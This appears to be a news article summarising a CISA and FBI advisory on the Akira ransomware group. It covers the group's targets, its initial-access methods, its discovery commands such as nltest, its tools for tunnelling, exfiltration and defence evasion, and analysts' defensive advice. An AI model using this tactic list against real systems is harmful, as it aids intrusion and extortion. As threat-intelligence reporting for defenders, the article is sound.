The Cybersecurity and Infrastructure Security Agency (CISA), along with the FBI and several international partners, has issued a new advisory warning organizations about the growing threat posed by the Akira ransomware group to critical infrastructure.
The latest update shows the ransomware group has expanded its capabilities beyond VMware ESXi and Hyper-V environments and is now targeting Nutanix AHV virtual machines as well.
While Akira initially focused on small and medium businesses in North America, Europe, and Australia, in the past, the group has increasingly shifted toward large enterprises with recent incidents infecting organizations in manufacturing, information technology, healthcare, financial services, and food and agriculture.
“Akira’s expansion beyond Windows into Linux servers, VMware ESXi, Hyper-V, and now Nutanix AHV is not some side experiment. It is a very deliberate signal that this group is planning for the long haul. Multi-platform ransomware is expensive to build and even harder to maintain,” said Sanchit Vir Gogia, chief analyst and CEO at Greyhound Research.
As of late September 2025, Akira ransomware has claimed approximately $244.17 million in ransomware proceeds, noted CISA.
How Akira breaks in
To gain initial access, the Akira threat actor exploited poorly secured virtual private network (VPN) services without multi-factor authentication (MFA), using known common vulnerabilities and exposures in products like Cisco and SonicWall.
The techniques used include deploying password spraying techniques, in addition to spearphishing, abusing valid credentials, and techniques that leverage external-facing services, like Remote Desktop Protocol. In some incidents, it had also gained access through the Secure Shell(SSH) protocol by exploiting a router’s IP address. Post tunnelling through a targeted router, it exploited publicly available vulnerabilities, such as those found in the Veeam Backup and Replication component of unpatched Veeam backup servers, noted the advisory.
Malicious commands were executed, including Visual Basic (VB) scripts. Akira threat actors used nltest /dclist: and nltest/DOMAIN_TRUSTS for network and domain discovery. In addition, to avoid detection, it abused remote access tools such as AnyDesk and LogMeIn to maintain persistence and blend in with administrator activity. It leveraged Impacket to execute the remote command wmiexec.py and also uninstalled endpoint detection and response (EDR) systems.
Threat actors also created new user accounts and added them to the administrator group to establish a foothold in the environment.
For command and control (C2) communications, it previously used two ransomware variants against different system architectures during one attempted compromise – Windows-specific “Megazord” ransomware and Akira ESXi encryptor, Akira_v2. However, Megazord has likely fallen out of use since 2024.
As per the new update, tunneling utilities, such as Ngrok, are being used to initiate encrypted sessions that bypass perimeter monitoring is being used. It also uses PowerShell and Windows Management Instrumentation Command-line (WMIC) to disable services and execute malicious scripts.
It has been using tools such as FileZilla and WinRAR to collect data and WinSCP and RClone to exfiltrate data. And post exfiltrating data, it used a double-extortion model, including encrypting systems and threatening to leak sensitive information. The advisory noted Akira threat actors were able to exfiltrate data in just over two hours from initial access.
Akira threat actors use ChaCha20 stream cipher with an RSA public-key cryptosystem for a fast and secure key exchange. While earlier the encrypted files appeared with a .akira or .powerranges extension, the new Akira_v2 variant also uses .akiranew or .aki.
To inhibit system recovery and impede forensic analysis, Akira’s encryptor (w.exe) used PowerShell commands to delete Volume Shadow Copy Service (VSS) copies on Windows systems. As per the new update, a ransom note named fn.txt or akira_readme.txt appears in both the root directory and each user’s home directory.
Threat that thrives in enterprise blind spots
Experts indicate that Akira leverages the blind spots that enterprises acknowledge but rarely fix. Of the blind spots, remote access tops the list, followed by patching.
“Akira wins not because it has reinvented ransomware, but because it has perfected the parts enterprises fail to take seriously. It exploits the inertia around forgotten VPN appliances, under-patched firewalls, ageing backup servers, and edge devices that fall outside everyday security conversations. The threat is subtle, persistent, and designed to thrive in the grey areas that organisations neglect,” said Gogia.
Gogia noted that network appliances and backup platforms are often months or years behind on updates, which is why Akira regularly exploits Cisco ASA, SonicWall, ESXi, and Veeam vulnerabilities that should have been long closed.
Rethinking ransomware defence
While the standard guidance includes patching, MFA, and regular backups, Akira wave drives home a clear need for additional defence mechanisms to be put in place.
“In 2025 alone, Akira ransomware accounted for about 8–11% of all successful ransomware attacks globally, with a 38% increase in incident count and a notable expansion into multi-platform attack methods,” said Devroop Dhar, co-founder and MD at Primus Partner. “This versatility means simultaneous disruption of endpoints and core business infrastructure, demonstrating a calculated, long-term vision by Akira’s developers to match the complexity and hybrid nature of modern enterprise systems.”
“Best practice now means robust network segmentation to confine breaches, vigilant monitoring for unusual admin activity, and extending detection and response to backup servers, hypervisor consoles, and connected devices,” added Dhar.
Proactive threat hunting, strict privilege management, and rehearsed recovery plans are vital, too, noted Dhar.
Enterprises must also rehearse full-scale ransomware scenarios. “These exercises need to blend technical recovery with legal strategy, communication plans, and data leak contingencies. The organisations that withstand Akira are not the ones with the most tools. They are the ones that have integrated their defences, shortened their detection windows, and treated resilience as an operational discipline rather than an aspiration,” added Gogia.
Dhar added that thinking like an attacker is now an essential skill, and plugging the gaps before they are exploited is what stands between disruption and survival.
No Responses